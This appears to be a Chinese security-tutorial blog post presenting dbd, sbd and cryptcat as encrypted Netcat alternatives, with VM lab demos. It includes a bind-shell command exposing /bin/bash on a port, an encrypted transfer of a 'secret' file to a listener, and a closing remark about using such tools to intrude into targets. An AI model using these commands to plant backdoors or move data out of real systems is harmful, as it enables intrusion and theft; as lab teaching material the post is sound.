哈罗~
昨天我们实作了Netcat(nc)的基本操作,
今天想来补充一些类似Netcat(nc)的东东。
dbd是使用TCP/IP传输,
Netcat有的功能,dbd也有,
差异在於dbd具有加密的功能,
使用AES-CBC-128 & HMAC-SHA1来加密通讯。
常用参数:
参数 | 说明 |
---|---|
-c | 启动加密传输,预设是on。 |
-l | 启动接听模式 |
-p | 指定port |
-e | 指定连线後要执行的档案 |
-r | 设定再次执行指令的间格秒数 |
-n | 不执行DNS解析 |
-P | 用简单交谈时会显示对象名称 |
-D | 转为背景执行 |
更多参数说明可使用dbd -h
来查询。
环境准备:
一台VM当Server (192.168.168.129)
一台VM当Client (192.168.168.131)
dbd -l -p 777 -e /bin/bash -r 3600
2. 当另一端连线至777 port後,就会取得电脑Shell的主控权。
透过ifconfig也可以确认IP已更改。
dbd -l [Server IP] 777
whoami
ifconfig
可以在Linux与Window(32位元)系统使用,与dbd很相似,
并使用AES-CBC-128 和HMAC-SHA1 来加密通讯。
更多功能说明可使用sbd -h
来查询。
与netcat是同性质的工具,
可透过TCP、UDP传输,
并在传送之前先进行加密。
常用参数:
参数 | 说明 |
---|---|
-l | 启动接听模式 |
-k | 指定密码,要两边都一致才可以建立连线 |
-u | UDP模式 |
-g | 设定gateway,最多8组 |
-n | 使用IP位址,不用DNS转换 |
更多参数说明可使用cryptcat -h
来查询。
环境准备:
一台VM当Server (192.168.118.131)
一台VM当Client (192.168.118.133)
cryptcat -l -p 7777 -k [密码] > upload
2. 待Client连线至7777port,并将Chilla的秘密存在sercet档案传给Server,且档案有进行加密。
cryptcat [Server IP] 7777 -k [密码] < sercet
3. Server 打开upload档案查看接听到的资讯时,就会看到存有Chilla秘密的sercet档。
cat upload
今天介绍的三个小工具:
都与我们前一篇介绍的Netcat相似,
这三个工具都有添加加密的功能,
只是dbd与sbd只支援TCP/IP传输。
想要入侵目标系统并取得权限,
除了使用漏洞强行进入、使用前面介绍的密码破解方式来提权,
也可利用这两天介绍的这种网路控制工具。
走罗! 高歌离席~
>>: Day21:今天来聊一下Firewall的Evasion
看完这篇文章你会得到的成果图 此篇文章的范例程序码 github https://github.co...
在工具列中的工具选项,找到插件管理器 点下去後跳出一个视窗 在这里就可以引入你想引入的插件啦 这边有...
Hash function 一个好的杂凑函数,可以把均匀的分布在杂凑表的每一个slot中,也就是尽量...
https://wolkesau.medium.com/python-语言-57370c0adcf7...
简介 editText有些常用设定,有时候会不小心忽略掉。虽然有些不是必备,但使用者体验的优化还是很...